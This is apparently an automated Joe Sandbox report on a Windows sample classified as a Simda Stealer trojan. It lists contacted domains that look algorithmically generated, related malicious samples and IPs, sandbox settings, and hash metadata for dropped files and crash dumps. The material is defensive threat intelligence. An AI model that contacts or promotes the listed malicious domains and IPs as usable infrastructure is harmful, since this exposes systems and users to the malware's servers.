                                                                                                                                                                                                          http://puzyduq.com/login.phpsvchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetynup.com/Hsvchost.exe, 00000002.00000003.2491008022.00000000066A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pumybuq.com/svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473737511.0000000006676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzydal.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahyzez.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galyvas.com/login.phpsvchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puryxag.com/login.phpsvchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063935893.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://qegyhig.com/wp-json/svchost.exe, 00000002.00000003.1650789737.00000000066CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796639933.0000000006795000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://volyzic.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499203809.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                          Analysis ID:1507240
                                                                                                                                                                                                          Start date and time:2024-09-08 10:51:40 +02:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 10m 6s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:25
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:15
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:OjKmJJm2YT.exe
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:Virus.Hijack.ATA_virussign.com_ca30350fdb8b854abac0a08aa08ff89a.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.bank.troj.spyw.expl.evad.winEXE@7/34@2017/24
                                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                                                                                          • Number of executed functions: 78
                                                                                                                                                                                                          • Number of non-executed functions: 238
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 2.23.209.142, 2.23.209.133, 2.23.209.144, 2.23.209.135, 2.23.209.140, 2.23.209.192, 2.23.209.149, 2.23.209.136, 2.23.209.143, 2.23.209.160, 2.23.209.167, 2.23.209.161, 2.23.209.176, 2.23.209.166, 2.23.209.162, 2.23.209.168, 2.23.209.173, 2.23.209.171, 20.189.173.22
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: OjKmJJm2YT.exe
Time      Type             Description
04:53:14  API Interceptor  23650x Sleep call for process: svchost.exe modified
04:53:15  API Interceptor  4x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          aAP32K91Qx.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 194.195.211.98
                                                                                                                                                                                                          0HVVcaZuD1.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 194.195.211.98
                                                                                                                                                                                                          iN9u7DdJv4.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 194.195.211.98
                                                                                                                                                                                                          szLAUZKesq.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 194.195.211.98
                                                                                                                                                                                                          lyvyxor.com5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          kz2xIsjyEH.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          10627546311.zipGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          aAP32K91Qx.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          0HVVcaZuD1.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):24649
                                                                                                                                                                                                          Entropy (8bit):7.980563941123399
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:P0YZ3Jjaxk9sU4B5xLlrzEoqxq/bVeNDRXY0F/6sstkMA3geAaD47owr:dZ3VGB5h6iVeNtoqpbQeR47owr
                                                                                                                                                                                                          MD5:4DF1B3EC5C348C25BFB294B58C8E03C4
                                                                                                                                                                                                          SHA1:EE435970559C914EDD58CB538B6E46B882C5CA73
                                                                                                                                                                                                          SHA-256:6CA593168A442C5FF1002A80D3185AB2ABB9591EE5E45DA86A860F31B2B8B3BB
                                                                                                                                                                                                          SHA-512:B9E74A5E4EFAD3D4D376ADEAE445981FFFEC87482D7FD98C2DA02D1AFCD9F0624E74C8EA2598579E8F8B5AEF2B5064DC9061BF06D876386C4D0A23BC0106E6DB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):7.626935561277827
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                          MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                          SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                          SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                          SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):481
                                                                                                                                                                                                          Entropy (8bit):7.527776363899814
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:NGjx1vBGFaAKSM9vcxlxsrSTRT03EUIW/h:MfvsFDKPhc19ah
                                                                                                                                                                                                          MD5:59321621F4AA76577A12A9F6DF32DC0A
                                                                                                                                                                                                          SHA1:6EDB83B47C1A51BA481FBB2BFF6AABF3A88E8A11
                                                                                                                                                                                                          SHA-256:3492AA93902DE0093A551C6F280003BF33663E59811ECC06E1CDA2ACF2F2C5B0
                                                                                                                                                                                                          SHA-512:25E62E1C49C44C697F5F6CDCA059C25B0C12D4FF14BD8C09A05DFA559CA91327382DE031B1F1E82567C7E38824F1A9BAE4DC1429D50BAFFD3B538F807FB45E16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1226
                                                                                                                                                                                                          Entropy (8bit):7.841969824410941
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:IZsdS4WrVeqbxezuQj1kZ8l9KfPqiHb7xgk4qtrwRrY3D1/k:QsSrxbxez1Rg8yHgk4OrwC3G
                                                                                                                                                                                                          MD5:BEFCFA89C3EF283FCC257D8CF589E264
                                                                                                                                                                                                          SHA1:5807C5129242F9C60A72CCF0C80228194BEF28CC
                                                                                                                                                                                                          SHA-256:18437E988F00AD40E05A33F2FB3F2A18BA2CBE42021D10DB133BC3998564408F
                                                                                                                                                                                                          SHA-512:074A394C9A36EFA52B7610453A1F086A1CA3DA3E09936DEEC3DBA90CF6ADB78E1760D0EBAAC6535C95C0753C3E2958B3ECAB77EB9067E241463901BB2FF2BBE0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):6.479691220248167
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                          MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                          SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                          SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                          SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):7.626935561277827
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                          MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                          SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                          SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                          SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):6.479691220248167
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                          MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                          SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                          SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                          SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25019
                                                                                                                                                                                                          Entropy (8bit):7.981722510846547
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:WARva/n308nlnFMirDjlH/6QiOyNGQMyqHU4BzmWLtTBsI6WsXI0o3C+0A:W4ak8nl3r9Htbyq08/s/Ho3CVA
                                                                                                                                                                                                          MD5:4CCA350A458E78ECCB751A205B8FECDA
                                                                                                                                                                                                          SHA1:FD8D8F89C75D00777E921A10CCCF38E0727B9A68
                                                                                                                                                                                                          SHA-256:F79A239EB23E5310B058F316D73A939F6402E2093941EF7B2F9BA928E7D73200
                                                                                                                                                                                                          SHA-512:047027A1C226E4BFC7C2965E82EF6A0D39E636379ECD96B0B465F625BD674C42DE7BD522F2685F78C00BBE938E4B9AADFDF66CA71E581E8F61398FB93F732833
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.945291531409476
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:7+gF+eVGkts5hJoI7JfoQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEN9y:vgeM8K0BU/gjRJk1zuiF6Z24IO8cUE
                                                                                                                                                                                                          MD5:C84EBD237A111578EF6F1CDA2DDFE87F
                                                                                                                                                                                                          SHA1:F01072F2FD444699E3510A35D175B093BC5585E7
                                                                                                                                                                                                          SHA-256:A0AC60F025465B091B7D7819377C53DB72875C6FBC8497E0244B877AC32489FA
                                                                                                                                                                                                          SHA-512:4CF822EA32597472ADEE74EC688705F5D69168F5A7BEBB5D370A1E1BECD3524FA8F527A141691A483F7B7D2FD5BA83CA6FE10F37FC25E999C414923EBF64A566
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:Version=1 EventType=APPCRASH EventTime=133702591863143174 ReportType=2 Consent=1 UploadTime=133702591879080633 ReportStatus=524384 ReportIdentifier=06f043b5-2063-4ed0-8615-8f7cfd34d786 IntegratorReportIdentifier=c9b55657-f513-45ea-95cc-bae49641ee1d Wow64Host=34404 Wow64Guest=332 NsAppName=nFjEHtbDTFjy.exe AppSessionGuid=000014f8-0001-0014-62fa-056ecc01db01 TargetAppId=W:000620eea5a1692a85b1209d2565f24709a60000ffff!00005536b7532400baf27beb2bfd425159264ad71136!nFjEHtbDTFjy.exe Targe
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9389214433880366
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:SmFtkeVGMs5hJoI7JfoQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEN9Wr:dEeMMK0BU/gjRJkVzuiF6Z24IO8cUE
                                                                                                                                                                                                          MD5:7D52919A0E1038188941CA0A23FBD25A
                                                                                                                                                                                                          SHA1:B2486A84A46CDEE5BF0D4E38761B77523B114A09
                                                                                                                                                                                                          SHA-256:6FA7FF5F86B3BDDB78638550D8AF0345D371388F1FB5C1C0ECB38FB861297D89
                                                                                                                                                                                                          SHA-512:77C5330C4C69F155E0882138F1FB36226DCBB777D5FF284CCFC4326FDF62D0ED591396AD168FC2CD0979E9B40FFC472B558CA6921C22256789F7CC357877731F
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:Version=1 EventType=APPCRASH EventTime=133702591874329740 ReportType=2 Consent=1 UploadTime=133702591884798696 ReportStatus=524384 ReportIdentifier=1b5b5345-bedf-43f7-a5c3-35e32ce8b443 IntegratorReportIdentifier=5481beef-a6f1-44c8-8b45-be31ee4d8e5b Wow64Host=34404 Wow64Guest=332 NsAppName=nFjEHtbDTFjy.exe AppSessionGuid=00001370-0001-0014-e885-fb6dcc01db01 TargetAppId=W:000620eea5a1692a85b1209d2565f24709a60000ffff!00005536b7532400baf27beb2bfd425159264ad71136!nFjEHtbDTFjy.exe Targe
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9452739503815246
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:xRF2wluKeVGps5hJoI7JfoQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEy:3QKeMpK0BU/gjRJk1zuiF6Z24IO8cUE
                                                                                                                                                                                                          MD5:7806C5D62A48231A38E54741BF958DC4
                                                                                                                                                                                                          SHA1:D5B51A0C836E3E720D540900820E35782B17F199
                                                                                                                                                                                                          SHA-256:C90956262588F4B7D779364974D605C455E25D4EF84F8866BB084491E2C042E1
                                                                                                                                                                                                          SHA-512:EBDC0718DFF73F0ABA1F2918AB201253F373EABCF898379F20DDFDA865D33AF577B1CF14DA2C8759DE1633BC6F072A298B24E74A01480D8210BB53C0EE8B2235
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:Version=1 EventType=APPCRASH EventTime=133702591863129774 ReportType=2 Consent=1 UploadTime=133702591879067287 ReportStatus=524384 ReportIdentifier=a0064925-9d8e-4152-9a44-17c641a5e9ef IntegratorReportIdentifier=9ecc37ac-4762-4882-8cc7-781a1afd7452 Wow64Host=34404 Wow64Guest=332 NsAppName=nFjEHtbDTFjy.exe AppSessionGuid=00001b10-0001-0014-7ff4-016ecc01db01 TargetAppId=W:000620eea5a1692a85b1209d2565f24709a60000ffff!00005536b7532400baf27beb2bfd425159264ad71136!nFjEHtbDTFjy.exe Targe
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9387274744870066
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:NV/GFDreVGys5hJoI7JfoQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEN4:mpreMyK0BU/gjRJkVzuiF6Z24IO8cUE
                                                                                                                                                                                                          MD5:6ACDEAF0CD98F0CBFD101C2370C116DF
                                                                                                                                                                                                          SHA1:CA5FEA390AC69590D16182A6EA5E130F4693DD6C
                                                                                                                                                                                                          SHA-256:9FD9F73A7AF3D5D54A7D98739F3DC9DA2AB39DCAAD1842501DCCE3505EA0FA76
                                                                                                                                                                                                          SHA-512:1EEB4136E971C3A3F3168BBA96CB4F451160A634EB621AB22E1B467FA76875951AC3A17A939D9766C88919695EFF4691C4F8B138631BDE0D5375960CEE5D351F
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:Version=1 EventType=APPCRASH EventTime=133702591870607009 ReportType=2 Consent=1 UploadTime=133702591883576017 ReportStatus=524384 ReportIdentifier=f29f2df6-7b7b-4725-9a55-fa1087448203 IntegratorReportIdentifier=2fc2eadc-8cc4-4a98-95d5-8ac1e95afa25 Wow64Host=34404 Wow64Guest=332 NsAppName=nFjEHtbDTFjy.exe AppSessionGuid=00000ee8-0001-0014-9a3b-ff6dcc01db01 TargetAppId=W:000620eea5a1692a85b1209d2565f24709a60000ffff!00005536b7532400baf27beb2bfd425159264ad71136!nFjEHtbDTFjy.exe Targe
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 08:53:06 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):95510
                                                                                                                                                                                                          Entropy (8bit):1.989561889631803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:cYTcCS2IRzGAL7vda4aY2MH3v3KAgqoy7V3FrmBEcX:/ICbCzG67vda4/f31g8jmGc
                                                                                                                                                                                                          MD5:CD703D9370CD6EB57041DF2CE6E564F8
                                                                                                                                                                                                          SHA1:873678CC967F2A301292BCD627320E615079E4BC
                                                                                                                                                                                                          SHA-256:9A42BE2400EDDCB55055045FF8A28EB4B466E4F26D99F558F7B139504BF881D2
                                                                                                                                                                                                          SHA-512:B9085964FD49E01A67EB4FC790BB1C8FC6B4AB33076646B5E7FC6187BF303369C566D509D045E7ACDB1025E07749E869F8D1E6B90BCC8CDAFA0BB76391E64F49
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 08:53:06 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):96746
                                                                                                                                                                                                          Entropy (8bit):1.9929454035012792
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:907PcCStMwzbhFtaKavPlcPbls1NwMxxKrcmuDBAc52NVCSph:W7kC8Hzzt6vPlcyjwkxDVh2NPp
                                                                                                                                                                                                          MD5:4363F84E27751BD625B4BC114F18B695
                                                                                                                                                                                                          SHA1:96565993519B8045DA1099C8B0858C7962C81CD6
                                                                                                                                                                                                          SHA-256:2C7567DDE22D70A7F6374BF4107E40943A9532E0AAC0CCC5EA69CFFBD86489BA
                                                                                                                                                                                                          SHA-512:9D48DB52C9FF03B91966316C2D35693D9E2C04F8E8C6EC1F204FD162C4828C6BA0B0174A826C2437ED3D059D716E4C8FC577EB2DAAA636289F324E4D18D9039F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8362
                                                                                                                                                                                                          Entropy (8bit):3.70656602139426
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJlx6M6YcDPSUpPgmfWXprY89bvwsfhFm:R6lXJj6M6YYSUpPgmfWPvDfa
                                                                                                                                                                                                          MD5:375E2EA9BF1713FD389AB130C68A1F11
                                                                                                                                                                                                          SHA1:D95738500DF4FA6CCB68192B70FF63B502A72F65
                                                                                                                                                                                                          SHA-256:24C3C634D858F4FD8877698E095E4A55F9638439081F4DA26AE61FA089FB96C9
